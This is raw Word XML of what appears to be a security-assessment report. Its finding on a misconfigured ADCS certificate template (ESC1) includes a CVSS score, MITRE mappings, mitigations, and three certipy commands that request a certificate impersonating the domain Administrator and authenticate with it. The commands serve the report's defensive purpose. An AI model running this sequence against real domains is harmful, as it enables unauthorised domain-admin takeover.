        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="03CF07D6" w14:textId="3F3697F4">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1654E318" w:rsidP="0D325B6E" w:rsidRDefault="1654E318" w14:paraId="517DACD9" w14:textId="1905D8F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654E318">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654E318" w:rsidP="0D325B6E" w:rsidRDefault="1654E318" w14:paraId="3B041685" w14:textId="7DEA9484">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d9bf676c4f684dd8">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="1654E318">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>DigiCert - Creating Password Policy Best Practices</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="36C4D8AF" w14:textId="2DEB37BE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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0DA1275" w14:textId="1A1BD957">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04DFA7FC" w14:textId="18337E50">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sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2EED05A8" w14:textId="1FED8BB5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="12FE5E65" w14:textId="47B80EBF">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0280701E" w:rsidP="0D325B6E" w:rsidRDefault="0280701E" w14:paraId="3DF6421A" w14:textId="4F5877E0">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0280701E">
        <w:rPr>
          <w:rFonts w:ascii="Aptos Display" w:hAnsi="Aptos Display" w:eastAsia="Aptos Display" w:cs="Aptos Display"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="660000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0280701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C1: ADCS Misconfigured Certificate Template – </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0280701E">
        <w:rPr>
          <w:rFonts w:ascii="Aptos Display" w:hAnsi="Aptos Display" w:eastAsia="Aptos Display" w:cs="Aptos Display"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ESC1</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4C44CC7C">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6797E9" w14:textId="6053589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DA9C09A" w14:textId="7CD6174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1803756" w14:textId="559EC0A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5199A43E">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0767A52" w14:textId="4D71F53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72789D9E" w14:textId="64ED7431">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3ECC7F3F" w14:textId="6A6F70DB">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9.4</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27FD3A31" w14:textId="6AE2A16C">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50B6309B">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403134" w14:textId="55BDEEE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E8CEBBD" w14:textId="4C84453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002EB496"/>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B3AACDE"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="41A03981">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7360AC" w14:textId="3EE9F62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E5600FF" w14:textId="34B031FA">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" r:id="R65e8eff61f8a40cd">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="1F2EBD1D">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39C35D9" w14:textId="6BDEC1A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B3D7BC" w14:textId="32D628A2">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7C2929D" w14:textId="15350E4A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R0c5f9aabfae145b1">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1648: Steal or Forge Authentication Certificates</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="42E35A39">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38C4BA50"/>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F016F6" w14:textId="11D405FB">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BC22AA5" w14:textId="61798FCE">
            <w:pPr>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278dafa5a50e4b54">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1015: Active Directory Configuration</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4CF01CB6" w14:textId="07564F6C">
            <w:pPr>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3ef1990bcbf44d07">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1047: Audit</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="75127B51">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C49FFA8" w14:textId="5BBABE1C">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FD0F06C" w14:textId="3E380D11">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2F530D65" w14:textId="3AAFB6D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280701E" w:rsidP="0D325B6E" w:rsidRDefault="0280701E" w14:paraId="3E56C78E" w14:textId="2AB3520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280701E" w:rsidP="0D325B6E" w:rsidRDefault="0280701E" w14:paraId="04084E3D" w14:textId="4015EAA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highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ESC1</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 is a misconfiguration in a certificate template within APT’s Active Directory Certificate Services (ADCS). This vulnerable template allows a low privileged user to authenticate as the domain administrator, gaining privileged access to APT’s domain. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="197A6B4A" w14:textId="701E80D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280701E" w:rsidP="0D325B6E" w:rsidRDefault="0280701E" w14:paraId="3FE60081" w14:textId="3515857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280701E" w:rsidP="0D325B6E" w:rsidRDefault="0280701E" w14:paraId="4A2CE254" w14:textId="7D78FE2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Successful exploitation of </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0280701E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ESC1</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 will allow threat actors to exfiltrate sensitive data from the domain and disrupt cruise operations by taking down critical domain systems, </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possibly leading</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 to a loss of life. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="22E25FFE" w14:textId="5EBD92F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280701E" w:rsidP="0D325B6E" w:rsidRDefault="0280701E" w14:paraId="15AF2877" w14:textId="1FD9B20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280701E" w:rsidP="0D325B6E" w:rsidRDefault="0280701E" w14:paraId="33DAABE2" w14:textId="1A53B59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Step 1: Identify vulnerabilities within the certificate templates:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0280701E" w:rsidP="0D325B6E" w:rsidRDefault="0280701E" w14:paraId="0D5B73EE" w14:textId="415AE23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certipy find -username </w:t>
      </w:r>
      <w:hyperlink r:id="Rf7563eb9f96c4a23">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0280701E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="auto"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>john@corp.local</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0280701E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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-password Passw0rd -dc-ip 172.16.126.128</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0280701E" w:rsidP="0D325B6E" w:rsidRDefault="0280701E" w14:paraId="408609C0" w14:textId="2D2CD9A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Step 2: Request a certificate to impersonate the Administrator user:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0280701E" w:rsidP="0D325B6E" w:rsidRDefault="0280701E" w14:paraId="4D12CC88" w14:textId="6D944D3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certipy req -userna</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0280701E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">me </w:t>
      </w:r>
      <w:hyperlink r:id="R20131e94c7174ab7">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0280701E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="auto"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>john@corp.local</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0280701E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0280701E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-password Passw0rd! -target-ip ca.corp.local -ca 'corp-CA' \ -template 'ESC1' -upn '</w:t>
      </w:r>
      <w:hyperlink r:id="Rf108266dead545d2">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0280701E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="auto"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>administrator@corp.local</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0280701E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'</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 vStep 3: Use the certificate to log in as the Administrator user:certipy auth –pfx administrator_cert.pfx -dc-ip</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0280701E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.0.0.5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="72F005E6" w14:textId="4AD326F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490B320" w:rsidP="0D325B6E" w:rsidRDefault="4490B320" w14:paraId="6E0F8460" w14:textId="7494C51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490B320" w:rsidP="0D325B6E" w:rsidRDefault="4490B320" w14:paraId="0ED0F20C" w14:textId="79003C8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490B320" w:rsidP="0D325B6E" w:rsidRDefault="4490B320" w14:paraId="737982C6" w14:textId="281D91F3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Disable the “Supply in the Request” Configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4490B320" w:rsidP="0D325B6E" w:rsidRDefault="4490B320" w14:paraId="3E806884" w14:textId="37DD6610">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Enable the “CA Manager Approval” requirement.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4490B320" w:rsidP="0D325B6E" w:rsidRDefault="4490B320" w14:paraId="757B0761" w14:textId="23156BBE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Remove any Extended Key Usage (EKU) properties that enable user authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4490B320" w:rsidP="0D325B6E" w:rsidRDefault="4490B320" w14:paraId="5B5AB1ED" w14:textId="180B5329">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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 xml:space="preserve">Restrict enrollment permissions to only trusted administrative or service accounts. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4490B320" w:rsidP="0D325B6E" w:rsidRDefault="4490B320" w14:paraId="74BFFF3B" w14:textId="01E80C9B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>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90B320">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Conduct regular audits of the ADCS system to identify any future misconfigurations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="45FCD825" w14:textId="39B81569">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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280701E" w:rsidP="0D325B6E" w:rsidRDefault="0280701E" w14:paraId="250E9242" w14:textId="785BBD3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80701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280701E" w:rsidP="0D325B6E" w:rsidRDefault="0280701E" w14:paraId="5BFC9146" w14:textId="69B99F3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0b746ab8f94a4ddc">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0280701E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve">Microsoft - ESC1 Security Assesment and Prevention </w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0280701E" w:rsidP="0D325B6E" w:rsidRDefault="0280701E" w14:paraId="5CECF031" w14:textId="72B3C5E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ad3cbafc7a5348e9">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0280701E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Crowdstrike - Investigating ESC1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="5FD740FA" w14:textId="7AA1E174">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="303DDB5E" w14:textId="30BC01FF">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="63684C02" w:rsidP="0D325B6E" w:rsidRDefault="63684C02" w14:paraId="64D1610D" w14:textId="6B7BF2A3">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63684C02">
        <w:rPr>
          <w:rFonts w:ascii="Aptos Display" w:hAnsi="Aptos Display" w:eastAsia="Aptos Display" w:cs="Aptos Display"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="660000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="63684C0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C1: Lack of Multi-Factor Authentication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7FF24C9B">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D486DA" w14:textId="69DD453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EF67B0" w14:textId="7B224AD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B95105" w14:textId="76F58E6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59DFFF9A">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BFA042" w14:textId="6E39096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0F43DE6B" w14:textId="2210D60D">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0C3F0549" w14:textId="3117098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BA15286" w14:textId="347284E1">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1A290578">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042D2BD" w14:textId="5F4CD2D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3EFF78E" w14:textId="7FD66656">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057FBD95"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4350" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="045FB3DB"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="33B232E1">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398751" w14:textId="5B51565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B58342C" w14:textId="78454B90">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="none"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="57B79FFC">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D394CA" w14:textId="786FD33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E0A778" w14:textId="6DCC4B95">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57F98CB" w14:textId="670F2F3B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Re9ee06990b034cdd">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1110: Brute Force</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="4D57FB53">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17739EB0"/>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D11ECB" w14:textId="3F3F1DC2">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43D643D" w14:textId="11C59BCF">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R64c0cdef90fb497d">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
